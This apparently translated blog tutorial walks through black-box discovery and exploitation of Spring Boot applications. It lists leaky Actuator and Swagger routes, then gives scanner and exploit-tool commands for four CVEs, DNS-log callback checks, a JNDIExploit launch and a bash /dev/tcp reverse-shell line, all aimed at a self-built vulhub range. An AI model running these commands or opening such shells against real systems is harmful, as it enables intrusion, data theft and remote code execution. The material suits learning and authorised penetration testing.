0x00 Preface
Spring is a lightweight open source framework in the field of Java EE programming, and spring boot is a new java framework optimized based on Spring.
In daily projects, we often encounter websites that use the Spring Boot framework. The blogger has sorted out the common utilization methods of this framework. The vulnerability environments in this article are all built locally.
This article focuses on how to discover and exploit vulnerabilities from a black box perspective.
0x01 Frame Features
1. Manual identification
1. The website picture file is a green leaf. 2. Unique error message. 3. Whitelabel Error Page keyword
2. Tool identification
Use VPS to set up a spring boot shooting range
awvs
goby
0x02 Information leakage
Routing knowledge
The default starting path of the built-in route for Spring Boot Actuator 1.x version is / , while the 2.x version uses /actuator as the starting path. Spring Boot Actuator's default built-in route name, such as /env, is sometimes modified by programmers, such as /appenv
1. Leakage of routing address and interface call details
Developers did not realize that address leakage would cause security risks or when the development environment was switched to an online production environment, the relevant personnel did not change the configuration file or forgot to switch the environment configuration, etc.
Directly access the following two swagger-related routes to verify whether the vulnerability exists:
/v2/api-docs /swagger-ui.html
Some other related interface routes that you may encounter, such as swagger, swagger codegen, swagger-dubbo, etc.:
/swagger /api-docs /api.html /swagger-ui /swagger/codes /api/index.html /api/v2/api-docs /v2/swagger.json /swagger-ui/html /distv2/index.html /swagger/index.html /sw/swagger-ui.html /api/swagger-ui.html /static/swagger.json /user/swagger-ui.html /swagger-ui/index.html /swagger-dubbo/api-docs /template/swagger-ui.html /swagger/static/index.html /dubbo-provider/distv2/index.html /spring-security-rest/api/swagger-ui.html /spring-security-oauth-resource/swagger-ui.html
In addition, the following spring boot actuator-related routes sometimes contain (or infer) some interface address information, but parameter-related information cannot be obtained:
/mappings /metrics /beans /configprops /actuator/metrics /actuator/mappings /actuator/beans /actuator/configprops
Generally speaking, exposing the relevant interfaces and parameter transmission information of the spring boot application is not considered a vulnerability, but in terms of “default security”, it is safer not to expose this information.
For attackers, they will generally carefully audit the exposed interfaces to increase their understanding of the business system, and will also check whether the application system has unauthorized access, unauthorized access and other business-type vulnerabilities.
2. Routes exposed due to improper configuration
Mainly because programmers did not realize that exposing routes may cause security risks when developing, or did not develop according to standard procedures, and forgot to modify/switch the configuration of the production environment when going online.
Default built-in routes exposed due to improper configuration may include:
/actuator /auditevents /autoconfig /beans /caches /conditions /configprops /docs /dump /env /flyway /health /heapdump /httptrace /info /intergrationgraph /jolokia /logfile /loggers /liquibase /metrics /mappings /prometheus /refresh /scheduledtasks /sessions /shutdown /trace /threaddump /actuator/auditevents /actuator/beans /actuator/health /actuator/conditions /actuator/configprops /actuator/env /actuator/info /actuator/loggers /actuator/heapdump /actuator/threaddump /actuator/metrics /actuator/scheduledtasks /actuator/httptrace /actuator/mappings /actuator/jolokia /actuator/hystrix.stream
Among them, the interfaces that are more important for finding vulnerabilities include: /env、/actuator/env GET request /env will directly leak information such as environment variables, intranet addresses, user names in configurations; when the programmer's attribute names are not standardized, for example, when password is written as psasword or pwd, the plain text of the password will be leaked; At the same time, there is a certain probability that some attributes can be set through the POST request /env interface, which indirectly triggers related RCE vulnerabilities; at the same time, there is a probability of obtaining the plain text of important private information such as passwords and keys covered by asterisks. /refresh、/actuator/refresh After setting attributes through the POST request /env interface, you can also refresh the attribute variables with the POST request /refresh interface to trigger related RCE vulnerabilities. /restart、/actuator/restart This interface is rarely exposed; you can set attributes with the POST request /env interface, and then restart the application with the POST request /restart interface to trigger related RCE vulnerabilities. /jolokia、/actuator/jolokia You can use the /jolokia/list interface to find exploitable MBeans, indirectly trigger related RCE vulnerabilities, and obtain the plaintext of important private information covered by asterisks, etc. /trace、/actuator/httptrace Some http request package access tracking information, it is possible to find some request information details of the intranet application system; as well as information such as cookies and jwt tokens of valid users or administrators.
0x03 CVE-2018-1273 (no echo)
Here is an external network shooting range environment using vps + vulhub
From a black box perspective, I only know that this is using the sping boot framework, and I don’t know anything else.
Vulnerability detection
It is recommended to use the SBSCAN scanning tool (supports sensitive directories and vulnerability detection)
Tool reference address:
https://blog.csdn.net/m0_60571842/article/details/133694136
python sbscan.py -u http://114.132.219.55:8080/ -ff -q
python sbscan.py -u http://114.132.219.55:8080/ -ff -q -d xdxhf5.dnslog.cn
Vulnerability confirmed! ! !
Then the tool also supports the use of proxy functions. If you want to know the data packets for vulnerability testing, you can forward the request to BP
python sbscan.py -u http://114.132.219.55:8080/ -ff -q -d xdxhf5.dnslog.cn -p 127.0.0.1:8080
0x04 CVE-2022-22947
Here is an external network shooting range environment using vps + vulhub
Similarly, I only know that this is using the sping boot framework, and I don’t know anything else.
Vulnerability detection
It is recommended to use the SBSCAN tool
Tool reference address:
https://blog.csdn.net/m0_60571842/article/details/133694136
python sbscan.py -u http://114.132.219.55:8080/ -q
Take a look at the results report
You can see that some routing addresses were leaked and the id command was executed.
Exploiting vulnerabilities
If the vulnerability in the target is detected through the vulnerability in the first step, then this step is simple and you can just exploit it.
1. GOBY
Here you can directly use the community version of goby to scan, and you can verify it online after scanning.
2. Spring_All_Reachable
Tool reference address:
https://blog.csdn.net/m0_60571842/article/details/132226378
3. SpringBootExploit
Tool reference address:
https://blog.csdn.net/m0_60571842/article/details/132271900
Execute the JNDIExploit tool on VPS
java -jar JNDIExploit-1.4-SNAPSHOT.jar -i 114.132.219.55
Follow the prompts to access http://114.132.219.55:8080/?cmd=id
4. SpringBoot-Scan-GUI
Tool reference address:
https://blog.csdn.net/m0_60571842/article/details/132269211
The method of use is very simple, just double-click to open the exe.
In this way, you need to click the Exploit button once to change a command, which is a bit inconvenient. You can try rebound shell
Recommend a rebound shell command to generate the address
https://forum.ywhack.com/shell.php
Monitor the corresponding port on the VPS
5. SpringBoot-Scan
Tool reference address:
https://blog.csdn.net/m0_60571842/article/details/132269014
python3 SpringBoot-Scan.py -v example.com
This CVE-2022-22947 currently does not support command interaction, and can only execute the id command.
0x05 CVE-2022-22963 (no echo)
Here is an external network shooting range environment using vps + vulhub
Use the Whitelabel Error Page keyword to know that the spring boot framework is used
Vulnerability detection and exploitation
1. SBSCAN
Tool reference address:
https://blog.csdn.net/m0_60571842/article/details/133694136
python sbscan.py -u http://114.132.219.55:8080/ -ff -q
python sbscan.py -u http://114.132.219.55:8080/ -ff -q -d 2l9lgj.dnslog.cn
Check if there is any record in dnslog
There are records and the vulnerability is confirmed! ! !
How to rebound the shell?
It also allows the tool to request data packets to go through BP, and just modify the test command.
python3 sbscan.py -u http://114.132.219.55:8080/ -ff -q -p 127.0.0.1:8080
Recommend a rebound shell command to generate the address
https://ares-x.com/tools/runtime-exec
Encoding content→ bash -i > & amp; /dev/tcp/192.168.0.105/8888 0> & amp;1
Monitor the corresponding port on the VPS
2. SpringBoot-Scan
Tool reference address:
https://blog.csdn.net/m0_60571842/article/details/132269014
python3 SpringBoot-Scan.py -v example.com
This tool supports the proxy function. It is very simple to manually rebound the shell. Just let the tool request the data packet to go through BP, and then go to BP to modify the test payload.
python3 SpringBoot-Scan.py -v http://114.132.219.55:8080/ -p 127.0.0.1:8080
Wouldn’t it be enough to change whoami to a rebound shell command?
3. SpringBoot-Scan-GUI
Tool reference address:
https://blog.csdn.net/m0_60571842/article/details/132269211
The method of use is very simple, just double-click to open the exe.
Recommend a rebound shell command to generate the address
https://ares-x.com/tools/runtime-exec
Encoding content→ bash -i > & amp; /dev/tcp/192.168.0.105/8888 0> & amp;1
Monitor the corresponding port on the VPS
4. Spring_All_Reachable
Tool reference address:
https://blog.csdn.net/m0_60571842/article/details/132226378
Recommend a rebound shell command to generate the address
https://forum.ywhack.com/shell.php
0x06 CVE-2022-22965
Here is an external network shooting range environment using vps + vulhub
Through Xiaoluye, I know that the spring boot framework is used
Vulnerability detection and exploitation
1. SBSCAN
Tool reference address:
https://blog.csdn.net/m0_60571842/article/details/133694136
python3 sbscan.py -u http://114.132.219.55:8080/ -q
View vulnerability report
command executed successfully
2. SpringBoot-Scan-GUI
Tool reference address:
https://blog.csdn.net/m0_60571842/article/details/132269211
The method of use is very simple, just double-click to open the exe.
Why didn’t it come out in the scan? Don’t worry.
3. SpringBoot-Scan
Tool reference address:
https://blog.csdn.net/m0_60571842/article/details/132269014
python3 SpringBoot-Scan.py -v example.com
This CVE supports command interaction